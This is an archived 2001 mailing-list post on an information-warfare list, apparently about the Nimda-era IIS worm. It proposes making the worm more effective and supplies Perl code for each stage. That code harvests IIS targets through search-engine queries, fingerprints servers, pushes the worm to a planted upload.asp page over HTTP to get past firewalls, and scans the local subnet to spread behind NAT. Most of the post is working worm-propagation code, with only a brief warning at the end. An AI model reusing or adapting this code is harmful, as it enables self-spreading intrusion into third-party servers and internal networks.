[iwar] [fc:Enhanced.worm.code.proposed.in.source.form...]

From: Fred Cohen (fc@all.net)
Date: 2001-09-19 19:01:47


Return-Path: <sentto-279987-2089-1000951291-fc=all.net@returns.onelist.com>
Delivered-To: fc@all.net
Received: from 204.181.12.215 by localhost with POP3 (fetchmail-5.1.0) for fc@localhost (single-drop); Wed, 19 Sep 2001 19:03:10 -0700 (PDT)
Received: (qmail 25679 invoked by uid 510); 20 Sep 2001 02:02:11 -0000
Received: from n32.groups.yahoo.com (216.115.96.82) by 204.181.12.215 with SMTP; 20 Sep 2001 02:02:11 -0000
X-eGroups-Return: sentto-279987-2089-1000951291-fc=all.net@returns.onelist.com
Received: from [10.1.1.220] by hn.egroups.com with NNFMP; 20 Sep 2001 02:01:48 -0000
X-Sender: fc@big.all.net
X-Apparently-To: iwar@onelist.com
Received: (EGP: mail-7_3_2_2); 20 Sep 2001 02:01:31 -0000
Received: (qmail 78804 invoked from network); 20 Sep 2001 02:01:31 -0000
Received: from unknown (10.1.10.26) by 10.1.1.220 with QMQP; 20 Sep 2001 02:01:31 -0000
Received: from unknown (HELO big.all.net) (65.0.156.78) by mta1 with SMTP; 20 Sep 2001 02:01:47 -0000
Received: (from fc@localhost) by big.all.net (8.9.3/8.7.3) id TAA09897 for iwar@onelist.com; Wed, 19 Sep 2001 19:01:47 -0700
Message-Id: <200109200201.TAA09897@big.all.net>
To: iwar@onelist.com (Information Warfare Mailing List)
Organization: I'm not allowed to say
X-Mailer: don't even ask
X-Mailer: ELM [version 2.5 PL1]
From: Fred Cohen <fc@all.net>
Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com
Delivered-To: mailing list iwar@yahoogroups.com
Precedence: bulk
List-Unsubscribe: <mailto:iwar-unsubscribe@yahoogroups.com>
Date: Wed, 19 Sep 2001 19:01:47 -0700 (PDT)
Reply-To: iwar@yahoogroups.com
Subject: [iwar] [fc:Enhanced.worm.code.proposed.in.source.form...]
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

(excuse the X posting - I dont know where it will be moderated)
Moderators,

Here some comments and code on the new worm. Publish if you think it might
do any good. If not I'll understand 100%. 

--cut--

Three things that could have made the worm better/worse:

1. Targetting
-------------
The targetting sucks. Random targetting is just SO ancient, and its simply
not nice. Why not use the technology out there - search engines. Lets say
I want to get some random 1000 Microsoft IIS servers - I get on to Google
and search for:

&lt;random word here +.asp -"application service provider"

..and browse through the list. In fact hereby a sweet little piece of PERL
that will do just that:

#!/usr/bin/perl
use Socket;
$host="www.google.com";
$port=80;
@nogos=("av.com","yahoo","google.com","excite","lycos","geocities");
$target = inet_aton($host);
$term="computer";

for ($i=0; $i&lt;1000; $i=$i+100){
 @response=sendraw("GET /search?q=$term+%22.asp%22+-application+-service+-provider&amp;n um=100&amp;hl=en&amp;safe=off&amp;start=$i&amp;sa=N HTTP/1.0\r\n\r\n");
 foreach $line (@response){
  if ($line =~ /http/){
   ($duh,$one)=split(/\/\//,$line);
   if ($one =~ /\.asp/) {
    ($two,$duh)=split(/\//,$one);
    $flag=0;
    foreach $nogo (@nogos){
     if ($two =~ /$nogo/){$flag=1;}
    }
    if ($flag==0){$url{$two}++;print $one;}
   }
  }
 }
}
foreach $theurl (keys(%url)){
 print "site: $theurl";
}

###good old sendraw
sub sendraw { 
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || return "";
 if(connect(S,pack "SnA4x8",2,$port,$target)){
  my @in="";
  select(S); $|=1; print $pstr;
  while(&lt;S) { 
   push @in,$_; last if ($line=~ /^[\n\r]+$/ );}
  select(STDOUT); return @in;
 } else { return ""; }
}

And there you go +- 1000 targets +- 75% of them nice fresh IIS boxes.
Select a new term, and hey - another 1000 IIS servers. Just shove a list
with 10000 terms in there, choose a random one and mine..it does not have
to be Google - there are zillions of search engines out there - pick a
random one. Now - isn't that a bit more effective than hitting random
boxes?? Then - why the heck hitting a box when you not even sure its an
IIS server? DUH!!!

##check for IIS
sub isms{
 ($name)=@_;
 @results = sendraw("HEAD / HTTP/1.0\r\n\r\n");
 foreach $line (@results){
  if ($line =~ /Microsoft/) {return "1";}
 }
 return "0";
}

2. Getting the worm at the other end.
------------------------------------- 
TFTP?? NOT! Why - is everyone allowing UDP to pass? I think not. How many
hosts allowing outside connections? Grim - simply grim. Just not cricket.
Why not get the worm on the box with HTTP only? Say - you can execute a
command on the server right? And do an "echo" right?? Why not create a
page where you can upload anything? Hereby the uploader to upload the worm
to the next host.

Uploader itself:

####use like this:$uploadresult=loader($host,$updir,$filename);
sub loader{
($host,$dir,$filename)=@_;
$target = inet_aton($host);
$headerfile=&lt;&lt;EOT
-----------------------------6628240843774015751103527590
Content-Disposition: form-data; name="File1"; filename="$filename"
Content-Type: application/octet-stream

EOT
;
$footerfile=&lt;&lt;EOT

-----------------------------6628240843774015751103527590
Content-Disposition: form-data; name="Action"

Upload the file
-----------------------------6628240843774015751103527590--
EOT
;

$headerfile=~s/\n/\r\n/g;
$footerfile=~s/\n/\r\n/g;
my $file;
open (IN,$filename) || return "1";
binmode(IN);
while (&lt;IN){
 $file=$file.$_;
}
$subheader=$headerfile.$file.$footerfile;
$filelength=length($subheader);
print "length of the request is $filelength\n";
$headerhttp=&lt;&lt;EOT
POST /$dir/upload.asp HTTP/1.0
User-Agent: None
Host: $host
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png,*/*
Accept-Encoding: gzip
Accept-Charset: iso-8859-1,*,utf-8
Content-type: multipart/form-data; boundary=---------------------------6628240843774015751103527590
Content-Length: $filelength

EOT
;
$headerhttp=~s/\n/\r\n/g;  
$fullrequest=$headerhttp.$subheader;
@r=sendraw($fullrequest);
foreach $line (@r){
 if ($line=~/Olifante/) {return "0";}
}
return "1";
}

Thats the loader itself. The page to create the upload page on the server
has been documented extensively before by myself. Go to packetstorm, and
search for "unitools". The tar file contains the upload pages and the code
to create the files on the server.

With this, the worm can be propogated through firewalls that do NAT and
filter everything but port 80. Only 80...thats all you need.

3. Further spread
-----------------
In many instances, webservers are connected with 1:1 NAT behind a
firewall. IP numbers of webservers in such schenarios are 10s, 172.16 and
192.168s. Now - again - if the server can't go out - why not go
in? Look at the class C, test for host there and spread internally:

@results=`ipconfig`;
foreach $line (@results){
 chomp $line;
 if ($line=~/Addr/){
  ($duh,$myip)=split(/:/,$line);
 }
}
##start internal scan
$num=0;
($one,$two,$three,$duh)=split(/\./,$myip);
for ($i=1; $i&lt;255; $i++){
 $scanip=$one.".".$two.".".$three.".".$i;
 @results=`ping -n 1 -w 40 $scanip`;
 foreach $scanned (@results){
  if ($scanned =~ /TTL/) {
   $eight=Sconnect(80,$scanip);
   if ($eight ==1){
    $ismic=isms($scanip);
    if ($ismic eq "1"){
     ($duh,$miner)=split(/from/,$scanned);
     (@mine[$num],$duh)=split(/\:/,$miner);
     @mine[$num] =~ s/ //g; 
     $num++;
    }
   }
  }
 }
}
sub Sconnect
{
 my($port,$address)=@_;
 my $ret=0;
 my $protocole=(getprotobyname("tcp"))[2];
 my $MASK="S n a4 x8";
 my @byte=split /\./, $address;
 $packAddress=pack("C4",@byte);
 my($connectPointer)=pack($MASK,&amp;AF_INET,$port,$packAddress);
 socket(SOCKET,&amp;AF_INET,&amp;SOCK_STREAM,$protocole)||die "Socket SConnect: $!\n";
 if(connect(SOCKET,$connectPointer)){
  $ret=1;
  close SOCKET;
 } 
 return $ret;
}  

With this we get all IIS server on the class C. Anyhow..

Bottom line? Well - just this - worms can be much more effective - so
beware - this is just the start. The Outlook/IE bit - nicely done (in a
severe twisted sense). 

Have a wonderful day,
Roelof.

------------------
http://all.net/ 

Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 



This archive was generated by hypermail 2.1.2 : 2001-09-29 21:08:45 PDT